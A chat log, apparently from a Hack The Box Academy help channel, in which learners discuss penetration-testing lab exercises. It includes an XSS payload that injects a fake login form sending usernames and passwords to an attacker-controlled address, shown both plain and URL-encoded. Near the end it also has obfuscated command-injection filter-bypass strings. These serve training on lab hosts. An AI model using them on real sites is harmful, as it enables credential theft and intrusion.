can I DM someone about AD Attacks and Enumeration module? "Apply what was taught in this section to gain a shell on DC01. Submit the contents of flag.txt located in the DailyTasks directory on the Administrator's desktop"

mortal shadow
#

very cool module

acoustic owl
hazy grotto
#

Linux Priv Escalation.

Logrotate.

I wget transferred all of the files for logrotten to the target. I compiled, created the payload, but when i run this code. I get an error.

fringe dew
#

I am stuck on attacking common service! I scan the machine and I got Apache web server! When I scan smtp user name, I found a user but I canโ€™t crack the password of username! Can anyone help me please?

mortal shadow
#

https://academy.hackthebox.com/module/103/section/984
is ```document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();

#

getting hella different outputs when exectuing 1:1 same code

mortal shadow
#

literally following the guide 1:1

#

i don't get it

hazy grotto
#

Right but why is that?

thorn urchin
#

cause the file doesnt exist

hazy grotto
#

I stepped away from my pc but I ran logrotate -v to ensure it was installed. It gave me a version that was susceptible to the exploit.

#

Which would imply the file should existV

mortal shadow
#

http://10.129.81.95/phishing/send.php?url=document.write(%27%3Ch3%3EPlease%20login%20to%20continue%3C/h3%3E%3Cform%20action=http://94.237.60.187:75%3E%3Cinput%20type=%22username%22%20name=%22username%22%20placeholder=%22Username%22%3E%3Cinput%20type=%22password%22%20name=%22password%22%20placeholder=%22Password%22%3E%3Cinput%20type=%22submit%22%20name=%22submit%22%20value=%22Login%22%3E%3C/form%3E%27);document.getElementById(%27urlform%27).remove();

bright arrow
#

rip @rustic sage

wanton estuary
#

Can anyone help with logging into the smb share in service scanning. I tried using bob:Welcome1 with a capital B aswell. I think its to do with the workgroup but I cannot enumerate this as the smb os discovery nmap script returns nothing.

hazy grotto
thorn urchin
hazy grotto
#

Nevermind I tried attempting this section in 25 mins so Iโ€™ll just try it again. Maybe I missed something.

wanton estuary
warm turret
#

People i have a question: I just completed the module Shells & Payloads. For the Host 3 on the Capstone exercise i had access denied to the administrator folder so i had to privesc. This is the intended path??? All this pivoting and Windows priv esc??

worldly arrow
#

The website for the Responder module is down and I can't move on to tier two in starting point

thorn urchin
#

verify your account in #welcome to gain access to a more relevant channel

worldly arrow
#

thx

flint wraith
#

@thorn urchincan you help me with a question

thorn urchin
#

not without knowing the question

flint wraith
#

@thorn urchini want to know does windows update ask for pin and userid to restart for a update

thorn urchin
#

like after restart or before restart

flint wraith
#

@thorn urchinbefore

thorn urchin
#

not that I ever recall no

flint wraith
#

@thorn urchinbut i was asked to give my pin and userid to restart my windows and i gave it to restart for update

thorn urchin
#

ยฏ_(ใƒ„)_/ยฏ

#

idk your settings

#

also what module relevance does this have

flint wraith
#

i don't see any general chat room or revelant chat room

#

and i am scared now

fathom pendant
flint wraith
#

what to do in welcome?

fathom pendant
flint wraith
#

@fathom pendantcan it be a malware too?

fathom pendant
flint wraith
#

i was dumb enough to restart it

#

Login to your HTB Account

#

i don't have htb account

fathom pendant
#

Then make one

#

It takes less than 5 minutes

flint wraith
#

@fathom pendantwill it unlocks genernal chat?

fathom pendant
#

It unlocks the rest of the server.

trail leaf
#

There is also a way to do it without privilege escalation, and you can DM about that if you want to

#

Also, I don't recall any pivoting needed unless you're trying to proxy your own VM through the foothold/parrot host that they give you

drowsy crypt
#

Hello guys, have you ever had this error with kerberos, using gettgtpkinit.py : "Error Name: KDC_ERR_PADATA_TYPE_NOSUPP Detail: "KDC has no support for PADATA type (pre-authentication data)" ?

thorn urchin
#

yup thats a pretty notorious issue

#

Theres not good fixes cause its not really well understood what causes it.

#

Sometimes can just be timing issues and you need to resync to the DC but other times your SoL without knowing some inane workarounds that only situationally work

#

98% of the time if you see it on HTB its cause somethings broken :/

rustic quiver
#

Hey guys i'm having trouble installing PSWindow update i'm getting this weird error can anyone help?

drowsy crypt
thorn urchin
#

Alh4zr3d got that error while doing the insane box Horus and got so frustrated that he was doing everything correctly but the box was just broken that he went out to become an ADCS expert and started making an ADCS hacking course just to prove he knew what he was doing on the box.

#

Thats how much of a malder that error can be

trail leaf
#

goat behavior honestly

thorn urchin
#

Sometimes I get second hand embarrassment when he gets too frustrated doing a machine on stream, but dudes overall pretty cool and a big inspiration

mortal shadow
#

damn now i see why vhosts are needed, but why do people use the FQDN (inlanefreight.local for example)

thorn urchin
#

but doing an insane box live on stream when viewers expect him to get it all correct within 3 hours and have the benefit of walkthroughs while he doesnt use em AND the more complicated the box the more likely it breaks when being retired? yeah I get why he gets mad

zinc marsh
#

someone know why proxy doesn't get installed?

#
$ go build -o agent cmd/agent/main.go
$ go build -o proxy cmd/proxy/main.go
# Build for Windows
$ GOOS=windows go build -o agent.exe cmd/agent/main.go
$ GOOS=windows go build -o proxy.exe cmd/proxy/main.go```
#

I used that commands to install ligolo-ng, the agent got installed but the proxy not

trail leaf
#

What do you mean by installed?

zinc marsh
thorn urchin
#

you dont install ligolo

#

it builds standalones

clear adder
#

I have killed the VPN process in my machine but the module doesn't turn off

#

When I try to start another machine, it asks me for turn off the first machine, but It doesn't turn off

#

Anyone knows what to do?

trail leaf
# zinc marsh

I just cloned the directory on my local machine with go 1.19.8 and managed to build the proxy with the given command

thorn urchin
zinc marsh
trail leaf
thorn urchin
#

looks like your go version is out of date

clear adder
trail leaf
#

their go version is more recent than mine, so I'm not sure if something is borked with their go installation or what

thorn urchin
clear adder
#

I am not even connected to the VPN and the machine is already ON

zinc marsh
#

In the github it says I need 1.17+

thorn urchin
#

maybe your go is TOO new

zinc marsh
#

maybe

#

I did full-upgrade yesterday

clear adder
#

Why? As far as I know I need to be connected to the VPN to be able to connect to the machine and resolve it

thorn urchin
#

oof never do full-upgrade

#

๐Ÿ˜ฌ

trail leaf
clear adder
#

By VPN I mean Starting Point

thorn urchin
#

full-upgrade updates everything even if its dependency breaking

#

its a great way to break your vm

trail leaf
#

Checking the issues on a github repository is a good troubleshooting step to see if people have had similar issues ๐Ÿ˜‰

thorn urchin
clear adder
#

Oh, alrighr

thorn urchin
#

I can have a box running without being on the vpn and I can be on the vpn without a box running

clear adder
#

Sounds reasonable

thorn urchin
#

also this channel isnt for starting point, read #welcome to verify your account and access more appropriate channels

zinc marsh
#

am installing other go version

teal stirrup
#

Who has done the Kerberos Attacks I can't seem to get past any of the delegation past unconstrained delegation computers.
trying to follow along just lead to failure I feel stupid

zinc marsh
#

am gonna try now

teal stirrup
#

oh wait I'm stupid

#

I'm always stupid

thorn urchin
zinc marsh
#

ty for the help it worked

teal stirrup
thorn urchin
#

the cycle continues

teal stirrup
#

I don't understand delegation

thorn urchin
#

me either, its on my to do list

teal stirrup
#

Is there going to be any point when Sapphire tickets and Diamond Tickets will be added to kerberos attacks?

Is is there really no point with Silver and Golden tickets being really all you need?

zinc marsh
#

@thorn urchin sorry 1 question. After installing the agent and proxy, I can delete the other files right?

thorn urchin
#

you dont install them, theyre standalones

#

and idk I dont delete the other stuff

civic zenith
#

Took me practically all day to complete the easy and medium skills assessments at the end of the Foot-Printing module. Hopefully the hard one doesn't take up my whole day tomorrow.

zinc marsh
thorn urchin
#

I liked the footprinting skill assessments

thorn urchin
zinc marsh
#

and the speed for scanning is the same than with proxychains?

thorn urchin
#

that sounds like something that requires specialized accessibility knowledge, so unlikely

civic zenith
thorn urchin
#

ยฏ_(ใƒ„)_/ยฏ

#

you can use a plugin to help for that

rotund urchin
#

Not sure what to do at this point or what I could do since its something with the DC/environment

zinc marsh
mortal shadow
#
#

would be cool if anyone could help, really wanna go to bed xd

red current
#

I'm confused on how to use the PrintSpoofer from github. I'm in the Exploitation and Privilege Escalation section in Attacking Enterprise Networks. I have the app downloaded to my VM, but there's no .exe file inside the directory. Is there something I'm missing here? Never mind. I figured out that you need to get the .exe from a different repository on github.

mortal shadow
#

i did

#

no way

#

i should really start to properly read things

#

wp was hella fun

rotund urchin
#

I am hoping somene can help me for the Bleeding Edge Vulnerabilities in the AD Attacks module.

mortal shadow
#

is there anyway to do the CBBH exam for less than 220โ‚ฌ?

#

with VAT

#

you know what i mean haha

jaunty vigil
#

anyone can help with linux privilege escalation

#

i literally can't find anything

trail leaf
#

There are a few ways to do that one afaik, one thing that helps is to straight up ask yourself or write down what youโ€™ve done, and then step back and ask what stone you havenโ€™t turned yet

#

The whole system is fair game, so donโ€™t restrict yourself to what the section tells you to do

zinc marsh
#

my session in ligolo-ng finished, how can I remove it to make a tunnel again?

trail leaf
#

Look at the man page for ip, you have resources to search for these things

fossil crescent
#

Just got the flag in the White Box Attacks: Remote Code Execution portion (after a lot of trial-and-error). Anyone who has done this get an actual remote shell, or just code execution to read the flag?

quartz coral
#

does anyone know what sekurlsa stands for?

swift dove
#

Hello, i have a problem

zinc marsh
quartz coral
swift dove
#

Can you help me with a problem?

#

I have recently started with htb but when starting a new machine I get a notice saying that before starting that machine I must turn off another but I do not have any more on.

#

Says: you must stop Your active machine before spawning another one

#

Thanks

rustic sage
fathom pendant
jaunty vigil
#

thats crazy tho

#

i didnt try to do all that cause it didnt make sense for it to want us to do an entire chain as the first module in the module

#

like it makes no sense they expect a beginner to know to do all that imo

rustic sage
#

did you try any different method?

jaunty vigil
#

dude i did it the hard way

#

i rooted the box

#

LMAOOo#

rustic sage
#

lulz

#

well done

#

I guess rooting was the intended way anyway

manic abyss
#

Hi

charred jay
#

Hi

summer canopy
#

Hey everyone, Im excited to be back to HTB Academy. When I was last working on the info gathering module I got stuck on zones section.

alpine glade
#

Hi all! Please help!! I am stuck at Living off the Land module, third question: "Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer.". Any ideas how this flag looks like?? dsquery command with ldap filters print out nothing. What am i doing wrong?

rustic quiver
#

Iโ€™m completely new and Iโ€™ve been enjoying everything so far even tho itโ€™s frustrating at times

summer canopy
#

so server cant find inlanefrieght.htb i know im doing something wrong cause i had this issue when i first started. What is it? I added the target to the etc/hosts file.

latent sigil
#

hello, is it normal i find flags on a machine that i am not supposed to find?

quaint hemlock
summer canopy
latent sigil
#

damn

#

is there anyway to go from a reverse shell in root to a rdp connection easily?

#

Password Attacks Lab - Easy

#

i cant find the flag

summer canopy
latent sigil
#

np

summer canopy
summer canopy
latent sigil
#

ah hen i can help you if youd like

umbral wigeon
summer canopy
#

i think i just caught myself up. its been like a year since i was last subbed to academy

latent sigil
umbral wigeon
#

isnt the flag the password for the root user

latent sigil
#

or maybe i dumb

#

i found that

summer canopy
latent sigil
#

not working

umbral wigeon
#

make sure u dont leave any spaces at the end

latent sigil
#

nope

umbral wigeon
#

u can dm me to check it if u like

summer canopy
#

i cant remember how i got the FQDN for inlanefreight

#

I already have the answer. i just cant remember how i got there

#

@latent sigil you still around?

latent sigil
#

Not really I'm headed to sleep

#

But what's up

summer canopy
#

I already have the answer for the getting the FQDN of the nameserver but i cant remember how I got there. I answered it ages ago

latent sigil
#

What module

summer canopy
#

info gathering web edition

#

my nslookup flags that it cant find inlanefreight.htb: NXDOMAIN

latent sigil
#

What question

#

I don't really use nslookup

summer canopy
#

Submit the FQDN of the nameserver for the "inlanefreight.htb" domain as the answer.

latent sigil
#

I used dig

summer canopy
#

honestly the whole module doesnt mention FQDN at all i dont think so.

#

dig actualy gives me output but i dont see the fqdn

latent sigil
#

Oh ok

#

I found your question

#

Nameservers are different from the normal domain

#

So the question is asking you to submit the subdomain+ domain of the nameserver

#

That's what fqdn

#

Fully qualified domain name if I remember correctly

summer canopy
#

ok so i need to remember how to find the nameserver

latent sigil
#

A simple dig all should do the trick

summer canopy
#

im starting to think im so rusty i need to just start from the beginning again lol

latent sigil
#

I mean you can reread the modules quickly

#

Or the cheat sheets

#

But imo I don't like dns

#

Even though it might seem as easy for some people

summer canopy
#

so dig will give the namserver?

latent sigil
#

Took me a while to understand

#

Hint: the name server is there when you do a normal dig of the main domain name

#

Dm me where you're at

summer canopy
naive wadi
#

I have a question regarding pass the hash challenge question 4. ||To get the flag I authenticate as the admin and then perform the pass the hash attack with davids hash, this opens a new command prompt where I can then use the type command to retrieve the flag. ||However if I just authenticate as ||david ||via rdp I get access denied & the same as if I just try to type the flag out as the ||admin||? Why is this, if I am using ||davids|| hash does this not imply he already has access rights? And as ||an admin|| would I not have rights accross the board? Struggling to wrap my head around why we have to chain these attacks to get the credentials for an access rights perspective.

frozen mesa
#

Linux priv. escalation -> Linux Services & Internals Enumeration -> What is the latest Python version that is installed on the target?

#

Python 3.8.10 whenever i get the version from the remote system

#

but the answer is not accepted.

#

Found the answer in the binary files instead of in version via other ways

fiery berry
quaint hemlock
sleek urchin
#

Doing Documentation & Reporting Practice Lab - been stuck for 3-5 hours
trying to achieve Domain Admin level access, submit the contents of the flag.txt file on the Administrator Desktop on the DC01 host.
I have collected users, passwords and cracked hashes, such as svc_vmwaresso, solarwindsmonitor, svc_vmwaresso, and ADMIN (ipmi_hash), etc..
and found other users such as librarian, and tried password spraying, and didn't get anything.
Using {PsExec + proxychains} for DEV01 and FILE01, and investigated the system and found nothing really useful
please help me if you can, thanks!!

frozen mesa
frozen mesa
#

linux priv. escalation ->path abuse -> Review the PATH of the htb-student user. What non-default directory is part of the user's PATH?

Anyone a hint? tried several options but none were accepted as good answer.

#

or hint about the way it should be noted, since this is mostly the problem

quaint hemlock
coarse void
fathom pendant
frozen mesa
autumn pilot
coarse void
#

sure

floral fulcrum
warm drift
#

let me try that

#

i got blank bage

sleek urchin
warm drift
#

what I mean is I forwarded it

#

then it's blank

sleek urchin
sleek urchin
#

but what the next step should look like, that i am not aware of

warm drift
fathom pendant
fathom pendant
#

When you forwarded your request?

warm drift
fathom pendant
#

Then your webshell isn't correct

#

Or you're not doing something right

#

If using php are you doing ?cmd=

warm drift
#

I downloaded the right webshell I didn't alter anything except the forwarding request

frozen mesa
fathom pendant
#

Or ?{var in your php shell}=

sleek urchin
fathom pendant
frozen mesa
#

i gave the answer that came up with pwd but the answer wasnt correct

fathom pendant
#

...

#

Are you accessing the page in burp

fathom pendant
#

Google environment variables

fathom pendant
warm drift
sleek urchin
# warm drift no the module says intercept

HTB never tells you to follow a specific way or use a specific tool, it only showcases a certain method or a certain way, and it's up to you to use it or not
of course it's always easier to use the presented way or explanation, and most likely it will work but sometimes you could try whatever, there's no *HTB-Police *

warm drift
fathom pendant
frozen mesa
fathom pendant
fathom pendant
frozen mesa
#

yes

fathom pendant
#

OK so you can just trial and error it

frozen mesa
#

I will, although i still dont understand exactly what i am looking for but thats just a matter of not understanding the language properly enough. THanks for nor

fathom pendant
#

I haven't done this one so I dont know it off the top of my head

fathom pendant
#

Basically the /not/default/path no colons

frozen mesa
#

ah thanks

fathom pendant
#

I'd suggest linux fundamentals tbh

heady tusk
fathom pendant
#

If that tripped you up then you should definitely look into learning the basics

frozen mesa
fathom pendant
frozen mesa
#

Learned the lesson after all with your help ๐Ÿ™‚

mighty wharf
#

Hey guys could anyone help me on the windows priv esc module I'm on the initial enumeration section last question "what type of session dose this user have" am I missing something here I can't work it out

spring sky
#

Hello fellas, I'm having some troubles with a module question: The module is INTRODUCTION TO BASH SCRIPTING. and is the following question: Create an "If-Else" condition in the "For"-Loop that checks if the variable named "var" contains the contents of the variable named "value". Additionally, the variable "var" must contain more than 113,450 characters. If these conditions are met, the script must then print the last 20 characters of the variable "var". Submit these last 20 characters as the answer. (https://academy.hackthebox.com/module/21/section/129) I have a script that's printing in screen the iteration number and the whole "var" string in screen when it has a match with the variable "value", however, when I write those last 20 characters the exercise tells me that I'm wrong.

spring sky
#

Lol it worked

#

Trank you Marcie, I'm curious, why 19 and not the 20 from the original question? ๐Ÿ˜†

fathom pendant
plain coral
#

Its because programmatically the index of a variable or array starts at 0

fathom pendant
#

When doing the last 20 the answer isn't accepted; last 19 is though. Its not a matter of computer counting

vagrant gust
#

just want to ask

#

is the penetration tester path fully covered in the crest cpsa path

heady tusk
#

simply go through the module list and check yourself

vagrant gust
#

this is peak laziness

#

my bad lmao

heady tusk
vagrant gust
warm drift
#

In the Shells and payloads module live engagement section I RDP into parrot machine in order to begin testing the targets but the parrot machine does't have a browser and I can se nmap result a web server for target 1 what do I do?

fiery berry
warm drift
#

INFO: Reverse shell will connect to: 172.16.1.5:4444.
Traceback (most recent call last):
File "/home/htb-student/./tomcatWarDeployer.py", line 1224, in <module>
main()
File "/home/htb-student/./tomcatWarDeployer.py", line 1076, in main
browser, url = browseToManager(
File "/home/htb-student/./tomcatWarDeployer.py", line 863, in browseToManager
m = re.search('Apache Tomcat/([^<]+)', data)
File "/usr/lib/python3.9/re.py", line 201, in search
return _compile(pattern, flags).search(string)
TypeError: cannot use a string pattern on a bytes-like object

fiery berry
warm drift
#

*requires

fiery berry
fiery berry
#

ah sorry my mistake !

warm drift
#

I thought I'd like like start a listener

fiery berry
#

its a connection back

#

@warm drift to use a web-browser which will make things easier just type "firefox" from the cli and go from there

plain coral
warm drift
iron plaza
#

I m on the Intro to Assembly Language (module/85section/893) and trying to solve this question: "The attached assembly code loops forever. Try to modify (mov rax, 5) to make it not loop. What hex value prevents the loop?" I have stopped the loop but I don't think I understood what hex value is it trying to ask off of me. Need some clarification and guidance on the matter

mortal shadow
iron plaza
mortal shadow
#

username-anarchy?

#

oh cupp

iron plaza
#

username-anarchy as it says is for username

#

so the second one is your go to method

mortal shadow
#

are we supposed to social engineer him (wife, dog, etc

#

or fine with first, last and username

iron plaza
mortal shadow
#

just saw i don't even need to do i myself

iron plaza
#

refresh your connection then cause that makes no sense

vocal tusk
#

hi guys im on this question 1 from the predictable reset module in brocken authentication

#

im not after an answer just someone to point me in right direction. im using the python script provided against the target website. i did use it againt my target script on the local host first and worked i tried that token in the htbadmin slot and dint work am i on right track or am i wasting my time

spring sky
#

Hello fellas, I'm having some troubles with one exercise from INTRODUCTION TO WINDOWS COMMAND LINE: User and Group Management. The question is the following... "Connect to the target host and search for a domain user with the given name of Robert. What is this users Surname?" But the current account credentials (mtanaka:HTB_@cademy_stdnt!) doesn't work with the SSH service I have to use to connect into the machine of that exercise.

#

I tried the HTB-Student credentials for that machine and it seems to work, but unfortunately the user restrictions doesn't allows me to use the powershell cmdlet to complete the exercise, so I was wondering if I have to use the username of mtanaka.

#

Nervermind people, I had to use MTanaka (Caps were the fail reason)

naive wadi
coral wraith
#

Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.

fathom pendant
coral wraith
fathom pendant
coral wraith
fathom pendant
coral wraith
fathom pendant
#

Are you sure the username needs to be in all caps. Also, have you tried all open services?

coral wraith
#

the user is fio**, and i found it with enumeration smtp

#

I tried to bruteforce the password, on hydra by (ftp/smtp/mysql)

fathom pendant
#

It's a skill assessment for a reason

#

Just go through each thing from the module individually

#

Refresh the page and try again

#

ยฏ_(ใƒ„)_/ยฏ

#

Sometimes that happens

mighty wharf
#

Hey guys could anyone help me on the windows priv esc module I'm on the initial enumeration section last question "what type of session dose this user have" am I missing something here I can't work it out

rustic arrow
rustic sage
#

Hello, I am stuck at the same point. Can you help me and explain how you resolved this and connected with Z: ?

fathom pendant
#

Try resetting the target first

mighty wharf
rustic arrow
#

If you don't get it then leave me a dm

#

I'll get back to you

mighty wharf
rotund urchin
#

Is there anyone in here to chat about machine connection issues? I am working in the AD Attacks and Enumeration module and it wants me to RDP to this host, but it keeps failing. I tried with both pwnbox and VPN, but no luck. RDP is open, but when I try to connect with the creds provided it does not work. Multiple resets do not work either :/

#

And the module will not offer a "request help" option, otherwise I would have tried that

pearl flint
#

guys can i ask somehin about password attacks section passwd opasswd and shaddow

#

its going to be a spoiler in question so idk if i can ask it here

#

nevermind got it

mighty wharf
urban anvil
rustic sage
muted fiber
forest dirge
#

hello any professional hacker here?

unborn shard
#

What does that even mean?

forest dirge
#

Well, I mean, is there any hacker here?

thorn urchin
#

obviously yes

forest dirge
thorn urchin
#

This channel is for module discussion only

forest dirge
#

A ok

#

Ok?

#

and where can I talk to any hacker here?

unborn shard
#

Go to an IRC, this is not the right place for that

thorn urchin
#

If you cant follow simple instructions then youre not gunna find much success

misty current
#

add --local-auth or -d . to the crackmapexec command

trail leaf
#

The very first line of the crackmapexec output can be a good clue

misty current
#

you can usually see it from the output from crackmapexec

#

(domain:) being empty means it's not domain joined

#

that's because you added --local-auth it takes the hostname itself to the domain attribute of cme to authenticate locally

mortal shadow
#

no fr

#

really really cool, very well done to whoever did it

iron grove
#

@undefinedname

mortal shadow
#

can anyone help me here

candid gale
#

Hey guys, I'm having troubles with the stack based buffer overflow module. It ask for the size of the stack space after overwriting the EIP register.

Info proc all give me a size that match with the format (0x00000 is the format) but it gives me incorrect answer. And hints? Thx in advance ๐Ÿ™๐Ÿผ

winter blaze
#

a

mortal shadow
#

{ls,}${PATH:0:1}home

#

what's wrong right here

thorn urchin
#

did you try downloading with the user credentials you found

#

yup, terminal special chara cab be annoying

#

Id also delete the image cause of spoilers

trail leaf
#

You could also use single quotes which should also fix that

zinc marsh
#

I was always using the hashcat identifier online and I just discovered this by mistake, if someone didn't know either like me

gusty zinc
#

anyone available for a nudge on "session security" final skills assessment ?

zinc marsh
#
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

500 | md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5) | Operating System

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.```
mortal shadow
#

how can i filter this bypassed character %7c aka |
it's not working urlencoded for me
WORKS ip=127.0.0.1%0afi$@nd%09${PATH:0:1}us$@r${PATH:0:1}sh$@ar$@e${PATH:0:1}%09
DOESN'T WORK ip=127.0.0.1%0afi$@nd%09${PATH:0:1}us$@r${PATH:0:1}sh$@ar$@e${PATH:0:1}%09%7c

mortal shadow